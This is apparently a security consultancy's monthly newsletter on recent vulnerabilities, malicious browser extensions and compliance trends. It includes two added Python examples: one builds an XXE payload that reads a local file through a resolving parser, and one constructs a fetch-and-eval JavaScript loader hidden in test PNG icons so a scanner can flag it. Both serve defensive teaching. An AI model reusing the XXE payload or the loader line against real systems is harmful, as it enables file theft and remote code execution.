BARR Advisory Senior Consultant Sean Estrada has picked out five security and compliance headlines from the past month that you need to know. Take a look to find out what our consulting team has been reading this December—plus, scroll to see Sean’s CISO Pick of the Month for his top new resource for security and compliance professionals this month.
Apple has rushed out security updates for nearly all its operating systems and the Safari browser to address two WebKit vulnerabilities that were actively being exploited. One of these flaws, a memory corruption issue, is the same vulnerability that Google had already patched in its Chrome browser earlier this week. Apple said the vulnerabilities “may have been exploited in an extremely sophisticated attack against specific targeted individuals on versions of iOS before iOS 26.”
CISA has ordered government agencies to patch a critical, actively exploited XML External Entity (XXE) injection vulnerability in GeoServer. This flaw affects GeoServer 2.26.1 and earlier versions of the open-source server for sharing geospatial data. Exploitation of this vulnerability allows unauthenticated attackers to retrieve arbitrary files from affected servers. CISA has added the flaw to its Known Exploited Vulnerabilities Catalog and mandated that federal civilian executive branch agencies patch by the end of the year due to the significant risk it poses.
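The GeoServer item above is an XML External Entity (XXE) issue: attacker-supplied XML declares an entity whose SYSTEM identifier names a local file, and a parser that resolves external entities splices that file into the parsed document, which is how an unauthenticated request turns into arbitrary file retrieval. The following is an added example, not code from the article or from the GeoServer project, showing the mechanism with Python's standard-library SAX parser: the same constructed payload is run through a parser with external entity resolution switched on, through the stdlib default (resolution off), and through a pre-parse check that refuses any DOCTYPE. The request body is only loosely shaped like a WFS request; nothing about GeoServer's actual vulnerable code path is claimed, and the secret file is constructed for the demo.

```python
"""Added example (not from the article or the GeoServer project): how an XXE
reference pulls a local file into parsed XML content, and two ways to stop it.
Standard library only."""
import io
import os
import re
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges


class TextCollector(ContentHandler):
    """Collects character data so we can see what the parser 'resolved'."""

    def __init__(self):
        super().__init__()
        self.parts = []

    def characters(self, content):
        self.parts.append(content)

    @property
    def text(self):
        return "".join(self.parts)


def xxe_payload(path):
    """Constructed request body loosely shaped like a WFS GetFeature call.
    The internal DTD declares an external general entity whose SYSTEM id is a
    local file path; the body then references it, so a resolving parser
    splices the file's contents into the element text."""
    return (
        '<?xml version="1.0"?>\n'
        f'<!DOCTYPE GetFeature [ <!ENTITY xxe SYSTEM "{path}"> ]>\n'
        '<GetFeature><Query>&xxe;</Query></GetFeature>'
    ).encode()


def parse_resolving(doc):
    """Vulnerable configuration: external general entities are fetched and
    inlined. This is the setting a safe deployment must never leave on."""
    handler = TextCollector()
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, True)  # the dangerous switch
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(doc))
    return handler.text.strip()


def parse_default(doc):
    """Python's expat-based SAX parser leaves external general entities off
    by default (since 3.7.1); the &xxe; reference is silently skipped."""
    handler = TextCollector()
    parser = xml.sax.make_parser()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(doc))
    return handler.text.strip()


_DOCTYPE = re.compile(rb"<!DOCTYPE", re.IGNORECASE)


def reject_dtd(doc):
    """Defence in depth: untrusted XML sent to a data API has no business
    carrying a DTD at all, so refuse it before any parser sees it. This is
    independent of which parser library (and which of its defaults) is in use."""
    if _DOCTYPE.search(doc):
        raise ValueError("DOCTYPE not allowed in untrusted XML")


def demo():
    """Write a constructed secret file, run the same payload through all three
    paths, and return what each one saw."""
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as f:
        f.write("db_password=hunter2")  # constructed sample secret
        path = f.name
    try:
        doc = xxe_payload(path)
        results = {
            "resolving": parse_resolving(doc),  # leaks the file contents
            "default": parse_default(doc),      # entity skipped, nothing leaks
        }
        try:
            reject_dtd(doc)
            results["dtd_rejected"] = False
        except ValueError:
            results["dtd_rejected"] = True
        return results
    finally:
        os.unlink(path)


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name:>13}: {value!r}")
```

The resolving parser returns the secret as ordinary element text, which is exactly what a server would then echo back, log, or store. Relying on a parser's default is fragile (defaults differ between libraries and versions), so the DOCTYPE rejection is the control to add at the boundary of any service that accepts XML from unauthenticated clients.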
Security researchers from Koi found that eight “privacy” extensions for browsers including Chrome and Edge have harvested the complete conversations of over 8 million users across 10 major AI chat platforms. In one instance, the extension secretly injects code to intercept raw API traffic, capturing sensitive data that is then sold to a data broker for “marketing analytics purposes.” Given the scale and sensitivity of the data, uninstalling all affected extensions immediately is the only mitigation for the extensions themselves; anything sensitive that users pasted into those chats, such as credentials, keys, or internal documents, should be treated as already exposed and rotated or reviewed accordingly.
Security researchers from Koi also recently discovered 17 Firefox extensions using steganography to hide malware inside their icons, compromising thousands of users. The technique embeds a JavaScript loader within the icon’s raw bytes, which lets it slip past security scanners. Once installed, the malware runs a multi-stage infection that strips browser security protections and steals e-commerce commissions by redirecting affiliate links. This campaign highlights the serious risks of trusting browser add-ons and echoes Koi’s earlier warnings about “privacy” extensions secretly harvesting AI chat data.
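A loader hidden in an icon only works because image viewers and most store scanners treat a PNG as opaque pixels and ignore anything the decoder does not need. The following is an added triage check, not code from the article or from Koi’s research: it walks a PNG’s chunk structure and flags the places where smuggled bytes would have to sit (data trailing the IEND chunk, chunk types the PNG specification does not define, or chunk payloads that read as script rather than image data) and verifies each chunk’s CRC. The page does not say where the real loader was placed inside the icons, so the two constructed “tampered” icons here represent this example’s assumptions, not the observed campaign; the clean icon, the loader string, and the private chunk name `stEg` are all constructed for the demo.

```python
"""Added example (not from the article or from Koi's research): a triage
scan for browser-extension icon files that flags where a payload smuggled
into 'the icon's raw bytes' could live. Standard library only."""
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"
# Chunk types defined by the PNG specification (critical + common ancillary).
KNOWN_CHUNKS = {
    b"IHDR", b"PLTE", b"IDAT", b"IEND", b"tRNS", b"cHRM", b"gAMA", b"iCCP",
    b"sBIT", b"sRGB", b"tEXt", b"zTXt", b"iTXt", b"bKGD", b"hIST", b"pHYs",
    b"sPLT", b"tIME", b"eXIf",
}
# Cheap markers of JavaScript; a real scanner would use a proper tokenizer.
SCRIPT_MARKERS = (b"function", b"eval(", b"fetch(", b"document.", b"chrome.",
                  b"browser.", b"=>", b"XMLHttpRequest")


def looks_like_script(payload):
    """Heuristic: mostly printable ASCII plus at least one JS marker."""
    if not payload:
        return False
    printable = sum(32 <= b < 127 or b in (9, 10, 13) for b in payload)
    return printable / len(payload) > 0.9 and any(m in payload for m in SCRIPT_MARKERS)


def scan_png(data):
    """Return a list of human-readable findings; an empty list means nothing odd."""
    findings = []
    if not data.startswith(PNG_SIG):
        return ["not a PNG (bad signature)"]
    pos = len(PNG_SIG)
    saw_iend = False
    while pos + 8 <= len(data) and not saw_iend:
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        body = data[pos + 8:pos + 8 + length]
        crc_bytes = data[pos + 8 + length:pos + 12 + length]
        if len(body) < length or len(crc_bytes) < 4:
            findings.append(f"truncated chunk {ctype!r} at offset {pos}")
            return findings
        if struct.unpack(">I", crc_bytes)[0] != zlib.crc32(ctype + body):
            findings.append(f"bad CRC on chunk {ctype!r} at offset {pos}")
        if ctype not in KNOWN_CHUNKS:
            findings.append(f"non-standard chunk {ctype!r} ({length} bytes)")
        # Pixel and header chunks are binary by nature; everything else is
        # suspicious if it reads like code.
        if ctype not in (b"IHDR", b"PLTE", b"IDAT") and looks_like_script(body):
            findings.append(f"script-like text inside chunk {ctype!r}")
        saw_iend = ctype == b"IEND"
        pos += 12 + length
    if not saw_iend:
        findings.append("no IEND chunk")
        return findings
    trailing = data[pos:]  # decoders stop at IEND, so anything here is free real estate
    if trailing:
        note = "script-like" if looks_like_script(trailing) else "opaque"
        findings.append(f"{len(trailing)} {note} bytes after IEND")
    return findings


def _chunk(ctype, body):
    """Encode one PNG chunk: length, type, data, CRC-32 over type+data."""
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", zlib.crc32(ctype + body))


def make_icon(width=2, height=2):
    """Constructed, valid 8-bit greyscale PNG standing in for a clean icon."""
    ihdr = struct.pack(">IIBBBBB", width, height, 8, 0, 0, 0, 0)
    raw = b"".join(b"\x00" + b"\x80" * width for _ in range(height))  # filter 0 per row
    return PNG_SIG + _chunk(b"IHDR", ihdr) + _chunk(b"IDAT", zlib.compress(raw)) + _chunk(b"IEND", b"")


# Constructed loader string; the URL is a reserved, non-resolving name.
LOADER = b"(function(){fetch('https://example.invalid/s.js').then(r=>r.text()).then(eval)})();"
IEND_CHUNK = _chunk(b"IEND", b"")
CLEAN_ICON = make_icon()
# Assumption 1: payload appended after IEND, where every decoder ignores it.
TAMPERED_ICON = CLEAN_ICON + LOADER
# Assumption 2: payload carried in a private ancillary chunk (name is made up).
STEGO_ICON = CLEAN_ICON[:-len(IEND_CHUNK)] + _chunk(b"stEg", LOADER) + IEND_CHUNK

if __name__ == "__main__":
    for name, icon in (("clean", CLEAN_ICON), ("trailing", TAMPERED_ICON), ("chunk", STEGO_ICON)):
        print(name, scan_png(icon) or "no findings")
```

Run over an extension’s unpacked directory, this catches the two cheapest hiding spots and any chunk that was edited without recomputing its CRC; a more careful adversary can encode the loader into pixel data itself, which this structural check would not see, so treat an empty result as “nothing obvious” rather than “clean”.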
Thomas Kinsella, co-founder and COO of Tines, argues in a new op-ed that reliance on manual GRC processes can’t keep up with rising complexity. He suggests that a new approach, “GRC engineering,” must be adopted to treat compliance as a strategic asset, not just an obligation. This involves shifting to an automation-first, continuous assurance model where compliance is built into daily workflows and systems from the beginning. Kinsella contends that by automating routine tasks, GRC leaders can focus on strategy and enable the business to move securely and at speed.

Sean Estrada
Senior Consultant, Cybersecurity Consulting
FedRAMP in 2025: Modernization without Compromise
“FedRAMP is evolving.” In a new video, Aaron Hamlin, practice leader of cybersecurity consulting at BARR Advisory, explains the ins and outs of FedRAMP 20x and how it’s changing the game for organizations that want to do business with the federal government. Watch now ➡️
Want to get these insights straight to your inbox? Subscribe to Take5, our monthly newsletter featuring top security and compliance headlines, events, and resources—brought to you by CISOs from BARR’s cybersecurity consulting team.